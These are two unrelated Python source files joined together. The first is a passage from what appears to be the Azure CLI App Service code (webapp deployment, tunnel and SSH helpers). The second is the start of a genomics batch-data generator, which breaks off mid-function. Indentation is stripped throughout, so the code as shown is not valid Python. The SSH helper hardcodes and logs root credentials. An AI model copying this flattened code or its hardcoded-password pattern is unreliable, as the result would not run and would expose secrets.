"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan settings are
# updated, we update those
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=location)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if _is_linux else None, tags={"cli": 'webapp_up'},
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for an existing app we might need to update the stack runtime settings
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
elif os_name.lower() == 'windows' and site_config.windows_fx_version != runtime_version:
logger.warning('Updating runtime version from %s to %s',
site_config.windows_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, windows_fx_version=runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file after deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
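# Illustrative only (not part of this module): webapp_up backs the `az webapp up`
# command, so a typical invocation of the flow above looks roughly like the
# following sketches; the app name and location are placeholders.
#
#   az webapp up --name my-sample-app --location westus2 --sku F1 --dryrun
#   az webapp up --name my-sample-app --location westus2 --sku F1 --launch-browser
#
# --dryrun returns the JSON summary built from dry_run_str without creating
# resources; omitting it creates/updates the plan and app and zip-deploys the
# contents of the current directory.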
def _ping_scm_site(cmd, resource_group, name):
from azure.cli.core.util import should_disable_connection_verify
# wake up Kudu by making an SCM call
import requests
# workaround until the timeout-limits issue for Linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify())
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password)
_ping_scm_site(cmd, resource_group_name, name)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
c.run('cat /etc/motd', pty=True)
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None): # pylint: disable=too-many-statements
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise CLIError('remote debugging is enabled, please disable')
import platform
if platform.system() == "Windows":
raise CLIError('webapp ssh is only supported on linux and mac')
create_tunnel_and_session(cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout)
def create_devops_pipeline(
cmd,
functionapp_name=None,
organization_name=None,
project_name=None,
repository_name=None,
overwrite_yaml=None,
allow_force_push=None,
github_pat=None,
github_repository=None
):
from .azure_devops_build_interactive import AzureDevopsBuildInteractive
azure_devops_build_interactive = AzureDevopsBuildInteractive(cmd, logger, functionapp_name,
organization_name, project_name, repository_name,
overwrite_yaml, allow_force_push,
github_pat, github_repository)
return azure_devops_build_interactive.interactive_azure_devops_build()
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from msrestazure.tools import resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
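# the assembled ID follows the standard ARM format, e.g.
# /subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.Web/hostingEnvironments/<ase-name>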
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _validate_asp_sku(app_service_environment, sku):
# Isolated SKU is supported only for ASE
if sku in ['I1', 'I2', 'I3']:
if not app_service_environment:
raise CLIError("The pricing tier 'Isolated' is not allowed for this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
else:
if app_service_environment:
raise CLIError("Only pricing tier 'Isolated' is allowed in this app service plan. Use this link to "
"learn more: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans")
|
generators.py
|
"""
This module contains classes for all the sequence data generators
Classes
MSequenceGenerator - The main base class for all generators.
Multi task batch data generation for training deep neural networks
on high-throughput sequencing data of various genomics assays
MBPNetSequenceGenerator - Derives from MSequenceGenerator.
Multi task batch data generation for training BPNet on
high-throughput sequencing data of various genomics assays
IGNORE_FOR_SPHINX_DOCS:
License
MIT License
Copyright (c) 2020 Kundaje Lab
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or
sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
IGNORE_FOR_SPHINX_DOCS:
"""
import json
import logging
import multiprocessing as mp
import numpy as np
import os
import pandas as pd
import pyBigWig
import pyfaidx
import random
import re
from mseqgen import sequtils
from mseqgen.exceptionhandler import NoTracebackException
from mseqgen import utils
from queue import Queue
from threading import Thread
class MSequenceGenerator:
""" Multi task batch data generation for training deep neural
networks on high-throughput sequencing data of various
genomics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the two
column pandas dataframe containing the chromosome
position information is passed to the 'samples'
argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
beginning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions" (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation, default = 10
epochs (int): number of iterations for looping over input
data, default = 1
batch_size (int): size of each generated batch of data,
default = 64
samples (pandas.DataFrame): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
**Members**
IGNORE_FOR_SPHINX_DOCS:
_stranded (boolean): True if input data is stranded
_has_control (boolean): True if input data includes
bias/control track
_sampling_mode (str): the mode of sampling chromosome
positions; one of
['peaks', 'sequential', 'random', 'manual'].
_mode (str): 'train', 'val' or 'test'
_tasks (collections.OrderedDict): dictionary of input tasks
taken from input_data json
_num_tasks (int): the number of tasks in 'tasks'
_reference (str): the path to the reference genome fasta
file
_chroms (list): the list of chromosomes that will be sampled
for batch generation
_chrom_sizes_df (pandas.DataFrame): dataframe of the
chromosomes and their corresponding sizes
_num_threads (int): number of parallel threads for batch
generation
_epochs (int): number of iterations for looping over input
data
_batch_size (int): size of each generated batch of data
_input_flank (int): one half of input sequence length
_output_flank (int): one half of output sequence length
_max_jitter (int): the maximum absolute value of jitter to
vary the position of the peak summit to left or right
of the exact center of the input sequence. Range is
-max_jitter to +max_jitter.
_negative_sampling_rate (float): Use a positive value > 0.0
to specify how many negative samples will be added to
each batch. num_negative_samples =
negative_sampling_rate * batch_size. Ignored if
--sampling_mode is not 'peaks', and --mode is not
'train'
_rev_comp_aug (boolean): specify whether reverse complement
augmentation should be applied to each batch of data.
If True, the size of the generated batch is doubled
(i.e batch_size*2 or if negative samples are added then
(batch_size + num_negative_samples)*2). Ignored if
--mode is not 'train'
_shuffle (boolean): if True input data will be shuffled at
the beginning of each epoch
_ready_for_next_epoch (boolean): flag to control batch
generation for the next epoch. The consumer of the
generator is required to send this signal using
'set_ready_for_next_epoch'. This protocol is required
so that excessive and unnecessary batches are not
generated if they will not be consumed
_stop (boolean): flag to indicate that batch generation
should be terminated after the current epoch
_samples (pandas.DataFrame): two column pandas dataframe with
chromosome positions that will be used for generating
batches of data
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads=10, epochs=1, batch_size=64,
samples=None):
#: True if data is stranded
self._stranded = input_config['stranded']
#: True if data has controls
self._has_control = input_config['has_control']
#: ML task mode 'train', 'val' or 'test'
self._mode = batch_gen_params['mode']
#: sampling mode to get chromosome positions
self._sampling_mode = batch_gen_params['sampling_mode']
# make sure the input_data json file exists
if not os.path.isfile(input_config['data']):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.".format(input_config['data']))
# load the json file
with open(input_config['data'], 'r') as inp_json:
try:
#: dictionary of tasks for training
self._tasks = json.loads(inp_json.read())
except json.decoder.JSONDecodeError:
raise NoTracebackException(
"Unable to load json file {}. Valid json expected. "
"Check the file for syntax errors.".format(
input_config['data']))
# check if the reference genome file exists
if not os.path.isfile(reference_genome):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.", reference_genome)
# check if the chrom_sizes file exists
if not os.path.isfile(chrom_sizes):
raise NoTracebackException(
"File not found: {} OR you may have accidentally "
"specified a directory path.".format(chrom_sizes))
#: the number of tasks in _tasks
self._num_tasks = len(list(self._tasks.keys()))
#: path to the reference genome
self._reference = reference_genome
#: dataframe of the chromosomes and their corresponding sizes
self._chrom_sizes_df = pd.read_csv(
chrom_sizes, sep='\t', header=None, names=['chrom', 'size'])
#: list of chromosomes that will be sampled for batch generation
self._chroms = chroms
# keep only those _chrom_sizes_df rows corresponding to the
# required chromosomes in _chroms
self._chrom_sizes_df = self._chrom_sizes_df[
self._chrom_sizes_df['chrom'].isin(self._chroms)]
# generate a new column for sampling weights of the chromosomes
self._chrom_sizes_df['weights'] = \
(self._chrom_sizes_df['size'] / self._chrom_sizes_df['size'].sum())
#: number of parallel threads for batch generation
self._num_threads = num_threads
#: number of iterations for looping over input data
self._epochs = epochs
#: size of each generated batch of data
self._batch_size = batch_size
# rest of batch generation parameters
#: int:one half of input sequence length
self._input_flank = batch_gen_params['input_seq_len'] // 2
#: one half of input sequence length
self._output_flank = batch_gen_params['output_len'] // 2
#: the maximum absolute value of jitter to vary the position
#: of the peak summit to left or right of the exact center
#: of the input sequence. Range is -max_jitter to +max_jitter.
self._max_jitter = batch_gen_params['max_jitter']
#: Use a positive value > 0.0 to specify how many negative
#: samples will be added to each batch. num_negative_samples =
#: negative_sampling_rate * batch_size. Ignored if
#: --sampling_mode is not 'peaks', and --mode is not 'train'
self._negative_sampling_rate = \
batch_gen_params['negative_sampling_rate']
#: if True, reverse complement augmentation will be applied to
#: each batch of data. The size of the generated batch is
#: doubled (i.e batch_size*2 or if negative samples are added
#: then (batch_size + num_negative_samples)*2). Ignored if
#: --mode is not 'train'
self._rev_comp_aug = batch_gen_params['rev_comp_aug']
#: if True, shuffle the data before the beginning of the epoch
self._shuffle = batch_gen_params['shuffle']
if self._sampling_mode == 'peaks':
# get a pandas dataframe for the peak positions
# Note - we need the 'tasks' dictionary so we can access
# the peaks.bed files from the paths available in the
# dictionary
self._samples = sequtils.getPeakPositions(
self._tasks, self._chroms,
self._chrom_sizes_df[['chrom', 'size']], self._input_flank,
drop_duplicates=True)
elif self._sampling_mode == 'sequential':
if 'num_positions' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'num_positions'. "
"Required for sequential sampling mode")
if 'step_size' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'step_size'. "
"Required for sequential sampling mode")
# get a pandas dataframe with sequential positions at
# regular intervals
self._samples = sequtils.getChromPositions(
self._chroms, self._chrom_sizes_df[['chrom', 'size']],
self._input_flank, mode=self._sampling_mode,
num_positions=batch_gen_params['num_positions'],
step=batch_gen_params['step_size'])
# since the positions are fixed and equally spaced we
# won't jitter
self._max_jitter = 0
elif self._sampling_mode == 'random':
if 'num_positions' not in batch_gen_params:
raise NoTracebackException(
"Key not found in batch_gen_params_json: 'num_positions'. "
"Required for random sampling mode")
# get a pandas dataframe with random positions
self._samples = sequtils.getChromPositions(
self._chroms, self._chrom_sizes_df[['chrom', 'size']],
self._input_flank, mode=self._sampling_mode,
num_positions=batch_gen_params['num_positions'])
# the positions are already random, so no extra jitter is needed
self._max_jitter = 0
elif self._sampling_mode == 'manual':
# check if the samples parameter has been provided
if samples is None:
raise NoTracebackException(
"If sampling_mode is 'manual', 'samples' parameter"
"has to be set. Found None.")
if not isinstance(samples, pd.DataFrame) or \
set(samples.columns.tolist()) != set(['chrom', 'pos']):
raise NoTracebackException(
"'samples' parameter should be a valid pandas.DataFrame "
"with two columns 'chrom' and 'pos'")
#: two column pandas dataframe with chromosome positions,
#: columns = ['chrom', 'pos']
self._samples = samples
#: size of the input samples before padding
self._unpadded_samples_size = len(self._samples)
# pad self._samples dataframe with randomly selected rows
# so that the length of the dataframe is an exact multiple of
# num_threads * batch_size. We do this so we can equally divide
# the batches across several batch generation threads
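# worked example (illustrative numbers): with 1,000 samples, num_threads=10 and
# batch_size=64 the target multiple is 640, so (assuming round_to_multiple rounds
# up when smallest=True) exact_multiple is 1,280 and 280 padded rows are appended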
exact_multiple = sequtils.round_to_multiple(
len(self._samples), num_threads * batch_size, smallest=True)
pad_size = exact_multiple - len(self._samples)
if pad_size > 0:
# If the pad_size > #self._samples, then number of data
# samples for the set (train or val) is significantly less
# than num_threads * batch_size, so we'll have to sample
# the padded rows with replacement
replace = False
if pad_size > len(self._samples):
replace = True
logging.info("mode '{}': Sampling with replacement for "
"data padding")
self._samples = self._samples.append(
self._samples.sample(pad_size, replace=replace),
ignore_index=True)
#: size of the input samples after padding
self._samples_size = len(self._samples)
logging.info("mode '{}': Data size (with {} padded rows) - {}".format(
self._mode, pad_size, len(self._samples)))
def get_input_tasks(self):
"""
The dictionary of tasks loaded from the json file
input_config['data']
Returns:
dict: dictionary of input tasks
"""
return self._tasks
def get_unpadded_samples_len(self):
"""
The number of data samples before padding
Returns:
int: number of data samples before padding
"""
return self._unpadded_samples_size
def get_samples_len(self):
"""
The number of data samples used in batch generation
(after padding)
Returns:
int: number of data samples used in batch generation
"""
return self._samples_size
def len(self):
"""
The number of batches per epoch
Returns:
int: number of batches of data generated in each epoch
"""
return self._samples.shape[0] // self._batch_size
def _generate_batch(self, coords):
"""
Generate one batch of inputs and outputs
"""
raise NotImplementedError("Method not implemented. Used a "
"derived class.")
def get_name(self):
"""
Name of the sequence generator
"""
raise NotImplementedError("Method not implemented. Used a "
"derived class.")
def _get_negative_batch(self):
"""
Get chrom positions for the negative samples using
uniform random sampling across all the chromosomes
in self._chroms
Returns:
pandas.DataFrame:
two column dataframe of chromosome positions with
'chrom' & 'pos' columns
"""
# Step 1: select chromosomes, using sampling weights
# according to sizes
chrom_df = self._chrom_sizes_df.sample(
n=int(self._batch_size * self._negative_sampling_rate),
weights=self._chrom_sizes_df.weights, replace=True)
# Step 2: generate 'n' random numbers where 'n' is the length
# of chrom_df
r = [random.random() for _ in range(chrom_df.shape[0])]
# Step 3. multiply the random numbers with the size column.
# Additionally, factor in the flank size and jitter while
# computing the position
chrom_df['pos'] = ((chrom_df['size'] - ((self._input_flank
+ self._max_jitter) * 2))
* r + self._input_flank
+ self._max_jitter).astype(int)
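# this keeps every sampled position at least (input_flank + max_jitter) bases
# away from both chromosome ends, so the window fetched later never runs off
# the chromosome even after jitter is applied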
return chrom_df[['chrom', 'pos']]
def _proc_target(self, coords_df, mpq, proc_idx):
"""
Function that will be executed in a separate process.
Takes a dataframe of peak coordinates and parses them in
batches, to get one hot encoded sequences and corresponding
outputs, and adds the batches to the multiprocessing queue.
Optionally, samples negative locations and adds them to
each batch
Args:
coords_df (pandas.DataFrame): dataframe containing
the chrom & peak pos
mpq (multiprocessing.Queue): The multiprocessing queue
to hold the batches
"""
# divide the coordinates dataframe into batches
cnt = 0
for i in range(0, coords_df.shape[0], self._batch_size):
# we need to make sure we don't try to fetch
# data beyond the length of the dataframe
if (i + self._batch_size) > coords_df.shape[0]:
break
batch_df = coords_df.iloc[i:i + self._batch_size]
batch_df = batch_df.copy()
batch_df['status'] = 1
# add equal number of negative samples
if self._mode == "train" and \
self._sampling_mode == 'peaks' and \
self._negative_sampling_rate > 0.0:
neg_batch = self._get_negative_batch()
neg_batch['status'] = -1
batch_df = pd.concat([batch_df, neg_batch])
# generate a batch of one hot encoded sequences and
# corresponding outputs
batch = self._generate_batch(batch_df)
# add batch to the multiprocessing queue
mpq.put(batch)
cnt += 1
logging.debug("{} process {} put {} batches into mpq".format(
self._mode, proc_idx, cnt))
def _stealer(self, mpq, q, num_batches, thread_id):
"""
Thread target function to "get" (steal) from the
multiprocessing queue and "put" in the regular queue
Args:
mpq (multiprocessing.Queue): The multiprocessing queue
to steal from
q (Queue): The regular queue to put the batch into
num_batches (int): the number of batches to "steal"
from the mp queue
thread_id (int): thread id for debugging purposes
"""
for i in range(num_batches):
q.put(mpq.get())
logging.debug("{} stealer thread {} got {} batches from mpq".format(
self._mode, thread_id, num_batches))
def _epoch_run(self, data):
"""
Manage batch generation processes & threads
for one epoch
Args:
data (pandas.DataFrame): dataframe with 'chrom' &
'pos' columns
"""
# list of processes that are spawned
procs = []
# list of multiprocessing queues corresponding to each
# process
mp_queues = []
# list of stealer threads (that steal the items out of
# the mp queues)
threads = []
# the regular queue
q = Queue()
# to make sure we don't flood the user with warning messages
warning_dispatched = False
# number of data samples to assign to each processor
# (since we have already padded the data, len(data) is exactly
# divisible by num_threads)
samples_per_processor = int(len(data) / self._num_threads)
# batches that will be generated by each process thread
num_batches = []
# spawn processes that will generate batches of data and "put"
# into the multiprocessing queues
for i in range(self._num_threads):
mpq = mp.Queue()
# give each process a slice of the dataframe of positives
df = data[i * samples_per_processor:
(i + 1) * samples_per_processor][['chrom', 'pos']]
# the last process gets the leftover data points
if i == (self._num_threads - 1):
df = pd.concat([df, data[(i + 1) * samples_per_processor:]])
num_batches.append(len(df) // self._batch_size)
if df.shape[0] != 0:
logging.debug("{} spawning process {}, df size {}, "
"sum(num_batches) {}".format(
self._mode, i, df.shape, sum(num_batches)))
# spawn and start the batch generation process
p = mp.Process(target=self._proc_target, args=[df, mpq, i])
p.start()
procs.append(p)
mp_queues.append(mpq)
else:
if not warning_dispatched:
logging.warn("One or more process threads are not being "
"assigned data for parallel batch "
"generation. You should reduce the number "
"of threads using the --threads option "
"for better performance. Inspect logs for "
"batch assignments.")
warning_dispatched = True
logging.debug("{} skipping process {}, df size {}, "
"num_batches {}".format(
self._mode, i, df.shape, sum(num_batches)))
procs.append(None)
mp_queues.append(None)
logging.debug("{} num_batches list {}".format(self._mode,
num_batches))
# the threads that will "get" from mp queues
# and put into the regular queue
# this speeds up yielding of batches, because "get"
# from mp queue is very slow
for i in range(self._num_threads):
# start a stealer thread only if data was assigned to
# the i-th process
if num_batches[i] > 0:
logging.debug("{} starting stealer thread {} [{}] ".format(
self._mode, i, num_batches[i]))
mp_q = mp_queues[i]
stealerThread = Thread(target=self._stealer,
args=[mp_q, q, num_batches[i], i])
stealerThread.start()
threads.append(stealerThread)
else:
threads.append(None)
logging.debug("{} skipping stealer thread {} ".format(
self._mode, i, num_batches))
return procs, threads, q, sum(num_batches)
def gen(self, epoch):
"""
Generator function to yield one batch of data
Args:
epoch (int): the epoch number
"""
if self._shuffle:
# shuffle at the beginning of each epoch
data = self._samples.sample(frac=1.0)
logging.debug("{} Shuffling complete".format(self._mode))
else:
data = self._samples
# spawn multiple processes to generate batches of data in
# parallel for each epoch
procs, threads, q, total_batches = self._epoch_run(data)
logging.debug("{} Batch generation for epoch {} started".format(
self._mode, epoch))
# yield the correct number of batches for each epoch
for j in range(total_batches):
batch = q.get()
yield batch
# wait for batch generation processes to finish once the
# required number of batches have been yielded
for j in range(self._num_threads):
if procs[j] is not None:
logging.debug("{} waiting to join process {}".format(
self._mode, j))
procs[j].join()
if threads[j] is not None:
logging.debug("{} waiting to join thread {}".format(
self._mode, j))
threads[j].join()
logging.debug("{} join complete for process {}".format(
self._mode, j))
logging.debug("{} Finished join for epoch {}".format(
self._mode, epoch))
logging.debug("{} Ready for next epoch".format(self._mode))
class MBPNetSequenceGenerator(MSequenceGenerator):
"""
Multi task batch data generation for training BPNet
on high-throughput sequencing data of various
genomics assays
Args:
input_config (dict): python dictionary with information
about the input data. Contains the following keys -
*data (str)*
path to the json file containing task information.
See README for more information on the format of
the json file
*stranded (boolean)*
True if data is stranded
*has_control (boolean)*
True if control data has been included
batch_gen_params (dictionary): python dictionary with batch
generation parameters. Contains the following keys -
*input_seq_len (int)*
length of input DNA sequence
*output_len (int)*
length of output profile
*max_jitter (int)*
maximum value for randomized jitter to offset the
peaks from the exact center of the input
*rev_comp_aug (boolean)*
enable reverse complement augmentation
*negative_sampling_rate (float)*
the fraction of batch_size that determines how many
negative samples are added to each batch
*sampling_mode (str)*
the mode of sampling chromosome positions - one of
['peaks', 'sequential', 'random', 'manual']. In
'peaks' mode the data samples are fetched from the
peaks bed file specified in the json file
input_config['data']. In 'manual' mode, the two column
pandas dataframe containing the chromosome position
information is passed to the 'samples' argument of the class
*shuffle (boolean)*
specify whether input data is shuffled at the
beginning of each epoch
*mode (str)*
'train', 'val' or 'test'
*num_positions" (int)*
specify how many chromosome positions to sample if
sampling_mode is 'sequential' or 'random'. Can be
omitted if sampling_mode is "peaks", has no effect if
present.
*step_size (int)*
specify step size for sampling chromosome positions if
sampling_mode is "sequential". Can be omitted if
sampling_mode is "peaks" or "random", has no effect if
present.
reference_genome (str): the path to the reference genome
fasta file
chrom_sizes (str): path to the chromosome sizes file
chroms (str): the list of chromosomes that will be sampled
for batch generation
num_threads (int): number of parallel threads for batch
generation
epochs (int): number of iterations for looping over input
data
batch_size (int): size of each generated batch of data
samples (pandas.DataFrame): two column pandas dataframe
with chromosome position information. Required column
names are column 1:'chrom', column 2:'pos'. Use this
parameter if you set batch_gen_params['sampling_mode']
to 'manual'. default = None
kwargs (dictionary): python dictionary containing
parameters specific to BPNet. Contains the following
keys -
*name (str)*
model architecture name
*filters (int)*
number of filters for BPNet
*control_smoothing (list)*
nested list of gaussian smoothing parameters. Each
inner list has two values - [sigma, window_size] for
supplemental control tracks
**Members**
IGNORE_FOR_SPHINX_DOCS:
Attributes:
_control_smoothing (list): nested list of gaussian smoothing
parameters. Each inner list has two values -
[sigma, window_size] for supplemental control tracks
IGNORE_FOR_SPHINX_DOCS
"""
def __init__(self, input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads=10, epochs=100,
batch_size=64, samples=None, **kwargs):
# name of the generator class
self.name = "BPNet"
# call base class constructor
super().__init__(input_config, batch_gen_params, reference_genome,
chrom_sizes, chroms, num_threads, epochs, batch_size,
samples)
if 'control_smoothing' not in kwargs:
raise NoTracebackException(
"Key not Found: missing 'control_smoothing' parameter")
#: nested list of gaussian smoothing parameters. Each inner list
#: has two values - [sigma, window_size] for supplemental
#: control tracks
self._control_smoothing = kwargs['control_smoothing']
def _generate_batch(self, coords):
"""Generate one batch of inputs and outputs for training BPNet
For all coordinates in "coords" fetch sequences &
one hot encode the sequences. Fetch corresponding
signal values (for e.g. from a bigwig file).
Package the one hot encoded sequences and the output
values as a tuple.
Args:
coords (pandas.DataFrame): dataframe with 'chrom',
'pos' & 'status' columns specifying the chromosome,
the coordinate and whether the locus is a positive (1)
or negative (-1) sample
Returns:
tuple:
When 'mode' is 'train' or 'val' a batch tuple
with one hot encoded sequences and corresponding
outputs and when 'mode' is 'test' tuple of
cordinates & the inputs
"""
# reference file to fetch sequences
fasta_ref = pyfaidx.Fasta(self._reference)
# Initialization
# (batch_size, output_len, 1 + #smoothing_window_sizes)
control_profile = np.zeros((coords.shape[0], self._output_flank * 2,
1 + len(self._control_smoothing)),
dtype=np.float32)
# (batch_size)
control_profile_counts = np.zeros((coords.shape[0]),
dtype=np.float32)
# in 'test' mode we pass the true profile as part of the
# returned tuple from the batch generator
if self._mode == "train" or self._mode == "val" or \
self._mode == "test":
# (batch_size, output_len, #tasks)
profile = np.zeros((coords.shape[0], self._output_flank * 2,
self._num_tasks), dtype=np.float32)
# (batch_size, #tasks)
profile_counts = np.zeros((coords.shape[0], self._num_tasks),
dtype=np.float32)
# if reverse complement augmentation is enabled then double the sizes
if self._mode == "train" and self._rev_comp_aug:
